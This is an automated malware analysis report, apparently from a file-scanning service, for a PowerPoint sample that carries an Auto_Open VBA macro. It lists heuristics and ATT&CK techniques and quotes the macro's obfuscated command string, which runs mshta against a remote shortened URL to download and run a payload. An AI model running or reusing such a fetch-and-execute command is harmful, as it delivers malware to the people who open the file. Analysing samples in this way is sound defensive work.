MALICIOUS
100
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
The presence of an Auto_Open macro and a reference to the CreateProcess API indicates that this PowerPoint file is designed to execute malicious code upon opening. The VBA script attempts to construct a URL by concatenating strings: "msh" + "ta " + "http://www."+ "bitly.com/tyuwqghwqbsvaklajsmk", which is then passed to a function that likely downloads and executes a payload. This behavior is consistent with a macro-based downloader.
Heuristics 3
-
Reference to CreateProcess API high SC_STR_CREATEPROCESSReference to CreateProcess API
-
Auto_Open macro high OLE_VBA_AUTOAuto_Open macro
-
VBA macros detected medium OLE_VBA_MACROSDocument contains VBA macro code
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas2d00ad9f7538aa9a54e9039fdd6b3d3669d792c509d190710e299d28129bf512 |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 5644 bytes |
Open this report in the interactive analyzer, or submit your own file for analysis.